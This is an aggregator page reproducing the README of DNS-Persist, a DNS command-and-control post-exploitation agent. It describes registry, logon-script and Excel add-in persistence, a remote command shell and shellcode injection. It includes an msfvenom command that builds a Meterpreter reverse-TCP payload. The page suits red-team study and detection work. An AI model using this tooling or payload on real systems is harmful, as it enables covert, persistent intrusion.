GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → 0x09AL → Dns Persist

0x09AL / Dns Persist

Licence: mit
DNS-Persist is a post-exploitation agent which uses DNS for command and control.

Labels

pentestingredteampost-exploitation

Projects that are alternatives of or similar to Dns Persist

Oscp Pentest Methodologies
备考 OSCP 的各种干货资料/渗透测试干货资料
Stars: ✭ 166 (-13.09%)
Mutual labels:  pentesting, redteam, post-exploitation
Gtfoblookup
Offline command line lookup utility for GTFOBins (https://github.com/GTFOBins/GTFOBins.github.io) and LOLBAS (https://github.com/LOLBAS-Project/LOLBAS)
Stars: ✭ 123 (-35.6%)
Mutual labels:  pentesting, redteam
Bella
Bella is a pure python post-exploitation data mining tool & remote administration tool for macOS. 🍎💻
Stars: ✭ 112 (-41.36%)
Mutual labels:  pentesting, post-exploitation
Reconness
ReconNess is a platform to allow continuous recon (CR) where you can set up a pipeline of #recon tools (Agents) and trigger it base on schedule or events.
Stars: ✭ 131 (-31.41%)
Mutual labels:  pentesting, redteam
Resource files
mosquito - Automating reconnaissance and brute force attacks
Stars: ✭ 95 (-50.26%)
Mutual labels:  pentesting, redteam
Deepsea
DeepSea Phishing Gear
Stars: ✭ 96 (-49.74%)
Mutual labels:  pentesting, redteam
Redteam Tactics And Techniques
Red Teaming Tactics and Techniques
Stars: ✭ 2,190 (+1046.6%)
Mutual labels:  pentesting, redteam
Pentesting toolkit
🏴‍☠️ Tools for pentesting, CTFs & wargames. 🏴‍☠️
Stars: ✭ 1,268 (+563.87%)
Mutual labels:  pentesting, post-exploitation
Evilosx
An evil RAT (Remote Administration Tool) for macOS / OS X.
Stars: ✭ 1,826 (+856.02%)
Mutual labels:  pentesting, post-exploitation
Invoke Apex
A PowerShell-based toolkit and framework consisting of a collection of techniques and tradecraft for use in red team, post-exploitation, adversary simulation, or other offensive security tasks.
Stars: ✭ 162 (-15.18%)
Mutual labels:  pentesting, redteam
Passcat
Passwords Recovery Tool
Stars: ✭ 164 (-14.14%)
Mutual labels:  pentesting, redteam
Winpwn
Automation for internal Windows Penetrationtest / AD-Security
Stars: ✭ 1,303 (+582.2%)
Mutual labels:  pentesting, redteam
Thoron
Thoron Framework is a Linux post-exploitation framework that exploits Linux TCP vulnerability to provide a shell-like connection. Thoron Framework has the ability to create simple payloads to provide Linux TCP attack.
Stars: ✭ 87 (-54.45%)
Mutual labels:  pentesting, post-exploitation
Information Security Tasks
This repository is created only for infosec professionals whom work day to day basis to equip ourself with uptodate skillset, We can daily contribute daily one hour for day to day tasks and work on problem statements daily, Please contribute by providing problem statements and solutions
Stars: ✭ 108 (-43.46%)
Mutual labels:  pentesting, redteam
Atomic Red Team Intelligence C2
ARTi-C2 is a post-exploitation framework used to execute Atomic Red Team test cases with rapid payload deployment and execution capabilities via .NET's DLR.
Stars: ✭ 87 (-54.45%)
Mutual labels:  redteam, post-exploitation
Awesome Mobile Security
An effort to build a single place for all useful android and iOS security related stuff. All references and tools belong to their respective owners. I'm just maintaining it.
Stars: ✭ 1,837 (+861.78%)
Mutual labels:  pentesting, redteam
Pentesting Cookbook
A set of recipes useful in pentesting and red teaming scenarios
Stars: ✭ 82 (-57.07%)
Mutual labels:  pentesting, redteam
Thecollective
The Collective. A repo for a collection of red-team projects found mostly on Github.
Stars: ✭ 85 (-55.5%)
Mutual labels:  pentesting, redteam
Nimscan
🚀 Fast Port Scanner 🚀
Stars: ✭ 134 (-29.84%)
Mutual labels:  pentesting, redteam
Enumdb
Relational database brute force and post exploitation tool for MySQL and MSSQL
Stars: ✭ 167 (-12.57%)
Mutual labels:  pentesting, post-exploitation
View All Similar Projects ➔

DNS-Persist

DNS-Persist is a post-exploitation agent which uses DNS for command and control. The server-side code is in Python and the agent is coded in C++. This is the first version, more features and improvements will be made in the future.

Getting Started

Author

0x09AL - https://twitter.com/0x09al

Disclaimer

DO NOT USE THIS SOFTWARE FOR ILLEGALL PURPOSES.

THE AUTHOR DOES NOT KEEP ANY RESPONSIBILITY FOR ANY MISUSE OF THE CODE PROVIDED HERE.

Did I reinvent the wheel ?

There is a lot of great work on DNS C2 but I created this software to be more focused on the persistence part. I'm no expert in C++ and this is my first "real program" in C++ (so expect some cringe worthy code).

Suggestions about features and improvements are open.

Architecture

There are two main parts:

  1. DNS server
  2. Agent

alt text

Features

Persistence mechanisms

This version has only 3 persistence mechanisms. More will be added later.

  1. LogonScript persistence.
  2. RunKey persistence.
  3. Excel Addin persistence.

'Interactive' command shell

This version supports pseudo-interactive command shell that you can use to execute system commands.

Shellcode Injection

This version supports injection of 32-bit shellcode. The shellcode gets executed in a new thread in the same process, so crashing shellcode or invalid one will also crash the agent. Avoid NULL bytes on the shellcode.

Shellcode generation example

msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=port EXITFUNC=thread -b "\x00" -f hex -o /tmp/shellcode.hex

TODO LIST

  1. Add encryption. This version does not have any encryption so take your own risks when using it.
  2. Add more persistence mechanisms.
  3. Agent in different programming languages.

Installation & Usage

Server side

pip install dnslib
git clone https://github.com/0x09AL/DNS-Persist
python server.py

By default a DNS server on port 53 will be started. You can change that on the server.py file.

Agent

I used Visual Studio 2010 to code the agent so importing and compiling it should be fairly easy.

Keep in mind to change the DOMAIN_NAME variable in Declarations.h, to match your domain name.

The domain nameservers should point to the DNS-Persist IP address.

#define DOMAIN_NAME "example.com"

Screenshots

  1. Picture-1

alt text

  1. Picture-2

alt text

  1. Picture-3

alt text

  1. Picture-4

alt text

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].